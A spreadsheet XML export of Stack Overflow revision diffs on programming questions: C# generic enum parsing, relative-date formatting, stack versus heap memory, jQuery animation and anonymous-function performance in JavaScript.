        &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (!&lt;span class="hljs-keyword"&gt;typeof&lt;/span&gt;(T).IsEnum) &lt;span class="hljs-keyword"&gt;throw&lt;/span&gt; &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; ArgumentException(&lt;span class="hljs-string"&gt;"T must be an enumerated type"&lt;/span&gt;);_x000D_
        &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (&lt;span class="hljs-built_in"&gt;string&lt;/span&gt;.IsNullOrEmpty(&lt;span class="hljs-keyword"&gt;value&lt;/span&gt;)) &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; defaultValue;_x000D_
_x000D_
        &lt;span class="hljs-keyword"&gt;foreach&lt;/span&gt; (T item &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; Enum.GetValues(&lt;span class="hljs-keyword"&gt;typeof&lt;/span&gt;(T)))_x000D_
        {_x000D_
            &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (item.ToString().ToLower().Equals(&lt;span class="hljs-keyword"&gt;value&lt;/span&gt;.Trim().ToLower())) &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; item;_x000D_
        }_x000D_
        &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; defaultValue;_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm building a function to extend the Enum.Parse concept that&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; allows a default value to be parsed in case that an Enum value is not found&lt;/li&gt; _x000D_
  &lt;li&gt; Is case insensitive&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; So I wrote the following&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;        &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; T &lt;span class="hljs-title"&gt;GetEnumFromString&lt;/span&gt;&amp;lt;&lt;span class="hljs-title"&gt;T&lt;/span&gt;&amp;gt;(&lt;span class="hljs-params"&gt;&lt;span class="hljs-built_in"&gt;string&lt;/span&gt; &lt;span class="hljs-keyword"&gt;value&lt;/span&gt;, T defaultValue&lt;/span&gt;) &lt;span class="hljs-keyword"&gt;where&lt;/span&gt; T : Enum&lt;/span&gt;_x000D_
        {_x000D_
            &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (&lt;span class="hljs-built_in"&gt;string&lt;/span&gt;.IsNullOrEmpty(&lt;span class="hljs-keyword"&gt;value&lt;/span&gt;)) &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; defaultValue;_x000D_
            &lt;span class="hljs-keyword"&gt;foreach&lt;/span&gt; (T item &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; Enum.GetValues(&lt;span class="hljs-keyword"&gt;typeof&lt;/span&gt;(T)))_x000D_
            {_x000D_
                &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (item.ToString().ToLower().Equals(&lt;span class="hljs-keyword"&gt;value&lt;/span&gt;.Trim().ToLower())) &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; item;_x000D_
            }_x000D_
            &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; defaultValue;_x000D_
        }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I am getting a Error Constraint cannot be special class 'System.Enum'&lt;/p&gt; _x000D_
 &lt;p&gt; Fair enough, but is there a workaround to allow a Generic Enum, or am I going to have to mimic the Parse function and pass a type as an attribute, which forces the ugly boxing requirement to your code.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt; All suggestions below have been greatly appreciated, thanks&lt;/p&gt; _x000D_
 &lt;p&gt; Have settled on (I've left the loop to maintain case insensitivity - I am usng this when parsing XML)&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; &lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;EnumUtils&lt;/span&gt;_x000D_
{_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; T &lt;span class="hljs-title"&gt;ParseEnum&lt;/span&gt;&amp;lt;&lt;span class="hljs-title"&gt;T&lt;/span&gt;&amp;gt;(&lt;span class="hljs-params"&gt;&lt;span class="hljs-built_in"&gt;string&lt;/span&gt; &lt;span class="hljs-keyword"&gt;value&lt;/span&gt;, T defaultValue&lt;/span&gt;) &lt;span class="hljs-keyword"&gt;where&lt;/span&gt; T : &lt;span class="hljs-keyword"&gt;struct&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-function"&gt;, IConvertible&lt;/span&gt;&lt;/span&gt;_x000D_
    {_x000D_
        &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (!&lt;span class="hljs-keyword"&gt;typeof&lt;/span&gt;(T).IsEnum) &lt;span class="hljs-keyword"&gt;throw&lt;/span&gt; &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; ArgumentException(&lt;span class="hljs-string"&gt;"T must be an enumerated type"&lt;/span&gt;);_x000D_
        &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (&lt;span class="hljs-built_in"&gt;string&lt;/span&gt;.IsNullOrEmpty(&lt;span class="hljs-keyword"&gt;value&lt;/span&gt;)) &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; defaultValue;_x000D_
_x000D_
        &lt;span class="hljs-keyword"&gt;foreach&lt;/span&gt; (T item &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; Enum.GetValues(&lt;span class="hljs-keyword"&gt;typeof&lt;/span&gt;(T)))_x000D_
        {_x000D_
            &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (item.ToString().ToLower().Equals(&lt;span class="hljs-keyword"&gt;value&lt;/span&gt;.Trim().ToLower())) &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; item;_x000D_
        }_x000D_
        &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; defaultValue;_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>johnc</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre class="lang-csharp prettyprint-override"&gt;&lt;code&gt;static &lt;span class="diff-delete"&gt;readonly&lt;/span&gt; &lt;span class="diff-delete"&gt;SortedList&amp;lt;double,&lt;/span&gt; &lt;span class="diff-delete"&gt;Func&amp;lt;TimeSpan,&lt;/span&gt; &lt;span class="diff-delete"&gt;string&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="diff-delete"&gt;offsets&lt;/span&gt; = _x000D_
   &lt;span class="diff-delete"&gt;new&lt;/span&gt; &lt;span class="diff-delete"&gt;SortedList&amp;lt;double,&lt;/span&gt; &lt;span class="diff-delete"&gt;Func&amp;lt;TimeSpan,&lt;/span&gt; &lt;span class="diff-delete"&gt;string&amp;gt;&amp;gt;&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;{&lt;/span&gt;_x000D_
    { 0.75, &lt;span class="diff-delete"&gt;_&lt;/span&gt; =&amp;gt; "less than a minute"&lt;span class="diff-delete"&gt; },&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;   &lt;span class="diff-delete"&gt;{&lt;/span&gt; 1.5, &lt;span class="diff-delete"&gt;_&lt;/span&gt; =&amp;gt; "about a minute"&lt;span class="diff-delete"&gt; },&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;   &lt;span class="diff-delete"&gt;{&lt;/span&gt; 45, &lt;span class="diff-delete"&gt;x&lt;/span&gt; =&amp;gt; string.Format("{0} minutes", Math.Round(&lt;span class="diff-delete"&gt;x.&lt;/span&gt;TotalMinutes))&lt;span class="diff-delete"&gt; },&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;   &lt;span class="diff-delete"&gt;{&lt;/span&gt; 90, &lt;span class="diff-delete"&gt;x&lt;/span&gt; =&amp;gt; "about an hour"&lt;span class="diff-delete"&gt;},&lt;/span&gt;_x000D_
    &lt;span class="diff-delete"&gt;{ &lt;/span&gt;1440, &lt;span class="diff-delete"&gt;x&lt;/span&gt; =&amp;gt; string.Format("about {0} hours", Math.Round(Math.Abs(&lt;span class="diff-delete"&gt;x&lt;/span&gt;.TotalHours)))&lt;span class="diff-delete"&gt;},_x000D_
&lt;/span&gt;    &lt;span class="diff-delete"&gt;{&lt;/span&gt; 2880, &lt;span class="diff-delete"&gt;x&lt;/span&gt; =&amp;gt; "a day"&lt;span class="diff-delete"&gt;},_x000D_
&lt;/span&gt;    &lt;span class="diff-delete"&gt;{&lt;/span&gt; 43200, &lt;span class="diff-delete"&gt;x&lt;/span&gt; =&amp;gt; string.Format("{0} days", Math.Floor(Math.Abs(&lt;span class="diff-delete"&gt;x&lt;/span&gt;.TotalDays)))&lt;span class="diff-delete"&gt;},_x000D_
&lt;/span&gt;    &lt;span class="diff-delete"&gt;{&lt;/span&gt; 86400, &lt;span class="diff-delete"&gt;x&lt;/span&gt; =&amp;gt; "about a month"&lt;span class="diff-delete"&gt;},_x000D_
&lt;/span&gt;    &lt;span class="diff-delete"&gt;{&lt;/span&gt; 525600, &lt;span class="diff-delete"&gt;x&lt;/span&gt; =&amp;gt; string.Format("{0} months", Math.Floor(Math.Abs(&lt;span class="diff-delete"&gt;x&lt;/span&gt;.TotalDays / 30)))&lt;span class="diff-delete"&gt;},_x000D_
&lt;/span&gt;    &lt;span class="diff-delete"&gt;{&lt;/span&gt; 1051200, &lt;span class="diff-delete"&gt;x&lt;/span&gt; =&amp;gt; "about a year"&lt;span class="diff-delete"&gt;},_x000D_
&lt;/span&gt;    &lt;span class="diff-delete"&gt;{&lt;/span&gt; double.MaxValue, &lt;span class="diff-delete"&gt;x&lt;/span&gt; =&amp;gt; string.Format("{0} years", Math.Floor(Math.Abs(&lt;span class="diff-delete"&gt;x&lt;/span&gt;.TotalDays / 365)))&lt;span class="diff-delete"&gt; }_x000D_
};_x000D_
_x000D_
public static string ToRelativeDate(this DateTime input)_x000D_
{_x000D_
    TimeSpan x = DateTime.Now.Subtract(input&lt;/span&gt;);&lt;span class="diff-delete"&gt;_x000D_
    double TotalMinutes = x.TotalMinutes;_x000D_
    string Suffix = " ago";&lt;/span&gt;_x000D_
_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;   &lt;span class="diff-delete"&gt;if (TotalMinutes&lt;/span&gt; &lt;span class="diff-delete"&gt;&amp;lt; 0.0)_x000D_
    {_x000D_
        TotalMinutes = Math.Abs(TotalMinutes);_x000D_
        Suffix = " from now";_x000D_
    }_x000D_
_x000D_
    &lt;/span&gt;return &lt;span class="diff-delete"&gt;offsets&lt;/span&gt;.First(n =&amp;gt; TotalMinutes &amp;lt; n.Key).Value(&lt;span class="diff-delete"&gt;x&lt;/span&gt;) + Suffix;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre class="lang-csharp prettyprint-override"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;public &lt;/span&gt;static &lt;span class="diff-add"&gt;string&lt;/span&gt; &lt;span class="diff-add"&gt;ToRelativeDate(DateTime&lt;/span&gt; &lt;span class="diff-add"&gt;input)_x000D_
{_x000D_
&lt;/span&gt;  &lt;span class="diff-add"&gt;  TimeSpan oSpan = DateTime.Now.Subtract(input);_x000D_
    double TotalMinutes&lt;/span&gt; = &lt;span class="diff-add"&gt;oSpan.TotalMinutes;&lt;/span&gt;_x000D_
    &lt;span class="diff-add"&gt;string&lt;/span&gt; &lt;span class="diff-add"&gt;Suffix&lt;/span&gt; &lt;span class="diff-add"&gt;= " ago";&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;_x000D_
    if (TotalMinutes &amp;lt; 0.0)&lt;/span&gt;_x000D_
    {&lt;span class="diff-add"&gt;_x000D_
        TotalMinutes = Math.Abs(TotalMinutes);_x000D_
        Suffix = " from now";_x000D_
    }_x000D_
_x000D_
    var aValue = new SortedList&amp;lt;double, Func&amp;lt;string&amp;gt;&amp;gt;();_x000D_
   &lt;/span&gt; &lt;span class="diff-add"&gt;aValue.Add(&lt;/span&gt;0.75, &lt;span class="diff-add"&gt;()&lt;/span&gt; =&amp;gt; "less than a minute"&lt;span class="diff-add"&gt;);&lt;/span&gt;_x000D_
    &lt;span class="diff-add"&gt;aValue.Add(&lt;/span&gt;1.5, &lt;span class="diff-add"&gt;()&lt;/span&gt; =&amp;gt; "about a minute"&lt;span class="diff-add"&gt;);&lt;/span&gt;_x000D_
    &lt;span class="diff-add"&gt;aValue.Add(&lt;/span&gt;45, &lt;span class="diff-add"&gt;()&lt;/span&gt; =&amp;gt; string.Format("{0} minutes", Math.Round(TotalMinutes))&lt;span class="diff-add"&gt;);&lt;/span&gt;_x000D_
    &lt;span class="diff-add"&gt;aValue.Add(&lt;/span&gt;90, &lt;span class="diff-add"&gt;()&lt;/span&gt; =&amp;gt; "about an hour"&lt;span class="diff-add"&gt;);&lt;/span&gt;_x000D_
    &lt;span class="diff-add"&gt;aValue.Add(&lt;/span&gt;1440, &lt;span class="diff-add"&gt;()&lt;/span&gt; =&amp;gt; string.Format("about {0} hours", Math.Round(Math.Abs(&lt;span class="diff-add"&gt;oSpan&lt;/span&gt;.TotalHours)))&lt;span class="diff-add"&gt;);&lt;/span&gt; &lt;span class="diff-add"&gt;// 60&lt;/span&gt; &lt;span class="diff-add"&gt;*&lt;/span&gt; &lt;span class="diff-add"&gt;24_x000D_
&lt;/span&gt; &lt;span class="diff-add"&gt;  &lt;/span&gt; &lt;span class="diff-add"&gt;aValue.Add(&lt;/span&gt;2880, &lt;span class="diff-add"&gt;()&lt;/span&gt; =&amp;gt; "a day"&lt;span class="diff-add"&gt;); // 60 *&lt;/span&gt; &lt;span class="diff-add"&gt;48_x000D_
&lt;/span&gt;    &lt;span class="diff-add"&gt;aValue.Add(&lt;/span&gt;43200, &lt;span class="diff-add"&gt;()&lt;/span&gt; =&amp;gt; string.Format("{0} days", Math.Floor(Math.Abs(&lt;span class="diff-add"&gt;oSpan&lt;/span&gt;.TotalDays)))&lt;span class="diff-add"&gt;); // 60&lt;/span&gt; &lt;span class="diff-add"&gt;*&lt;/span&gt; &lt;span class="diff-add"&gt;24&lt;/span&gt; &lt;span class="diff-add"&gt;*&lt;/span&gt; &lt;span class="diff-add"&gt;30_x000D_
   &lt;/span&gt; &lt;span class="diff-add"&gt;aValue.Add(&lt;/span&gt;86400, &lt;span class="diff-add"&gt;()&lt;/span&gt; =&amp;gt; "about a month"&lt;span class="diff-add"&gt;);&lt;/span&gt; &lt;span class="diff-add"&gt;// 60&lt;/span&gt; &lt;span class="diff-add"&gt;*&lt;/span&gt; &lt;span class="diff-add"&gt;24&lt;/span&gt; &lt;span class="diff-add"&gt;*&lt;/span&gt; &lt;span class="diff-add"&gt;60_x000D_
    aValue.Add(&lt;/span&gt;525600, &lt;span class="diff-add"&gt;()&lt;/span&gt; =&amp;gt; string.Format("{0} months", Math.Floor(Math.Abs(&lt;span class="diff-add"&gt;oSpan&lt;/span&gt;.TotalDays / 30)))&lt;span class="diff-add"&gt;); // 60 *&lt;/span&gt; &lt;span class="diff-add"&gt;24&lt;/span&gt; &lt;span class="diff-add"&gt;*&lt;/span&gt; &lt;span class="diff-add"&gt;365&lt;/span&gt; &lt;span class="diff-add"&gt;_x000D_
   &lt;/span&gt; &lt;span class="diff-add"&gt;aValue.Add(&lt;/span&gt;1051200, &lt;span class="diff-add"&gt;()&lt;/span&gt; =&amp;gt; "about a year"&lt;span class="diff-add"&gt;); // 60&lt;/span&gt; &lt;span class="diff-add"&gt;*&lt;/span&gt; &lt;span class="diff-add"&gt;24&lt;/span&gt; &lt;span class="diff-add"&gt;*&lt;/span&gt; &lt;span class="diff-add"&gt;365 * 2_x000D_
   &lt;/span&gt; &lt;span class="diff-add"&gt;aValue.Add(&lt;/span&gt;double.MaxValue, &lt;span class="diff-add"&gt;()&lt;/span&gt; =&amp;gt; string.Format("{0} years", Math.Floor(Math.Abs(&lt;span class="diff-add"&gt;oSpan&lt;/span&gt;.TotalDays / 365))));_x000D_
_x000D_
    return &lt;span class="diff-add"&gt;aValue&lt;/span&gt;.First(n =&amp;gt; TotalMinutes &amp;lt; n.Key).Value&lt;span class="diff-add"&gt;.Invoke&lt;/span&gt;() + Suffix;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>leppie</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Programming language books explain that value types are created on the stack, and reference types are created on the heap, without explaining what these two things are. I haven't read a clear explanation of this. I understand what &lt;em&gt;a stack&lt;/em&gt; is, but where and what are they (physically in a real computer's memory)?&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; To what extent are they controlled by the OS or language runtime?&lt;span class="diff-delete"&gt;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lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; What is their scope?&lt;/li&gt; _x000D_
  &lt;li&gt; What determines the size of each of them?&lt;/li&gt; _x000D_
  &lt;li&gt; What makes one faster?&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Programming language books explain that value types are created on the stack, and reference types are created on the heap, without explaining what these two things are. I haven't read a clear explanation of this. I understand what &lt;em&gt;a stack&lt;/em&gt; is, but where and what are they (physically in a real computer's memory)?&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; To what extent are they controlled by the OS or language runtime?&lt;/li&gt; _x000D_
  &lt;li&gt; What is their scope?&lt;/li&gt; _x000D_
  &lt;li&gt; What determines the size of each of them?&lt;/li&gt; _x000D_
  &lt;li&gt; What makes one faster?&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Taryn â™¦</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Tthe&lt;/span&gt; original Macintosh debugger was &lt;a href="http://en.wikipedia.org/wiki/MacsBug" rel="nofollow noreferrer"&gt;MacsBug&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; So far as the kipper quote goes, the only thing that comes to mind is the &lt;a href="http://vx.netlux.org/lib/ars08.html#c236" rel="nofollow noreferrer"&gt;Pathogen&lt;/a&gt; computer virus.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;No one else has answered this, so I'll answer the part I can: the&lt;/span&gt; original Macintosh debugger was &lt;a href="http://en.wikipedia.org/wiki/MacsBug" rel="nofollow noreferrer"&gt;MacsBug&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; So far as the kipper quote goes, the only thing that comes to mind is the &lt;a href="http://vx.netlux.org/lib/ars08.html#c236" rel="nofollow noreferrer"&gt;Pathogen&lt;/a&gt; computer virus.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Dori</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Following on from dansays' comment, the following seems to work perfectly well:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;$('#thing').animate({dummy:1}, 2000).animate({/* etc ... */});_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Following on from dansays' comment, the following seems to work perfectly well:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;&lt;span class="diff-add"&gt;$('#thing') .animate({dummy:1}, 2000) .animate({ etc ... });&lt;/span&gt;&lt;/code&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>RET</t>
  </si>
  <si>
    <t>Alexander Elgin</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; How do&lt;/span&gt; I &lt;span class="diff-delete"&gt;delete questions&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I &lt;span class="diff-add"&gt;know the standard answer is No. However hear out the reasons for wanting it, and then we'll go for whether it is possible to achieve the same effect as ReadyBoost via either enabling (and installing) ReadyBoost or using third party software.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Reasons for using Widows Server 2008 as a development environment on a laptop:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; 64-Bit, so you get the full use of 4GB RAM.&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; SharePoint developer, so you can run SharePoint locally and debug successfully.&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; Hyper-V, so you get hardware virtualisation of test environments and the ability to demo full solutions stored in Hyper-V on the road&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; So all of that equals: Windows Server 2008 (64) on a laptop.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Now because we are running Hyper-V, we require a large volume of disk space. This means we are using 5,000 rpm 250GB HDD.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; So we are on a laptop, we are not able to use solid state HDD, and we only have 4GB of RAM and the throughput of a laptop motherboard rather than a server one... all of which means we are not flying... this thing isn't a sluggard but it's not zippy either.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Windows Server 2008 is based on the same code base as Vista. Vista features ReadyBoost, which enables USB 2 flash devices to be used as a weak cache for system files, which visibly increases the performance of Vista. As the codebases are similar, it should be possible for ReadyBoost to work on WS2008, however Microsoft have not shipped or enabled ReadyBoost in WS2008.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Given that we are running WS2008 on a laptop as a development environment, how can we achieve the performance gains of ReadyBoost through the use of flash devices in Windows Server 2008&lt;/span&gt;?&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; For the answer to be accepted it must outline an end to end process for achieving the performance gain.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Answers of 'No' will not be accepted as I understand some third party tools achieve some of the functionality, but I haven't seen a full end-to-end description of how to get going with them.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Bevan</t>
  </si>
  <si>
    <t>anonymous</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Edit:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; if you really concern of performance than both cases are not good.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; check the test results at &lt;/span&gt;&lt;a href="http://jsperf.com/named-or-anonymous-functions/12" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;http://jsperf.com/named-or-anonymous-functions/12&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; performance bump by function expression&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; see&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;img class="diff-delete" src="https://i.stack.imgur.com/pioru.png" alt="enter image description here"&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; The performance problem here is the cost of creating a new function object at each iteration of the loop and not the fact that you use an anonymous function:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;for (var i = 0; i &amp;lt; 1000; ++i) {    _x000D_
    myObjects[i].onMyEvent = function() {_x000D_
        // do something    _x000D_
    };_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; You are creating a thousand distinct function objects even though they have the same body of code and no binding to the lexical scope (&lt;a href="http://www.google.com/search?q=javascript+closure" rel="nofollow noreferrer"&gt;closure&lt;/a&gt;). The following seems faster, on the other hand, because it simply assigns the &lt;em&gt;same&lt;/em&gt; function reference to the array elements throughout the loop:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;function myEventHandler() {_x000D_
    // do something_x000D_
}_x000D_
_x000D_
for (var i = 0; i &amp;lt; 1000; ++i) {_x000D_
    myObjects[i].onMyEvent = myEventHandler;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; If you were to create the anonymous function before entering the loop, then only assign references to it to the array elements while inside the loop, you will find that there is no performance or semantic difference whatsoever when compared to the named function version:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var handler = function() {_x000D_
    // do something    _x000D_
};_x000D_
for (var i = 0; i &amp;lt; 1000; ++i) {    _x000D_
    myObjects[i].onMyEvent = handler;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In short, there is no observable performance cost to using anonymous over named functions.&lt;/p&gt; _x000D_
 &lt;p&gt; As an aside, it may appear from above that there is no difference between:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;function myEventHandler() { /* ... */ }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; and:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var myEventHandler = function() { /* ... */ }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The former is a &lt;em&gt;function declaration&lt;/em&gt; whereas the latter is a variable assignment to an anonymous function. Although they may appear to have the same effect, JavaScript does treat them slightly differently. To understand the difference, I recommend reading, â€œ&lt;a href="http://www.dustindiaz.com/javascript-function-declaration-ambiguity/" rel="nofollow noreferrer"&gt;JavaScript function declaration ambiguity&lt;/a&gt;â€?.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The performance problem here is the cost of creating a new function object at each iteration of the loop and not the fact that you use an anonymous function:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;for (var i = 0; i &amp;lt; 1000; ++i) {    _x000D_
    myObjects[i].onMyEvent = function() {_x000D_
        // do something    _x000D_
    };_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; You are creating a thousand distinct function objects even though they have the same body of code and no binding to the lexical scope (&lt;a href="http://www.google.com/search?q=javascript+closure" rel="nofollow noreferrer"&gt;closure&lt;/a&gt;). The following seems faster, on the other hand, because it simply assigns the &lt;em&gt;same&lt;/em&gt; function reference to the array elements throughout the loop:&lt;/p&gt; _x000D_
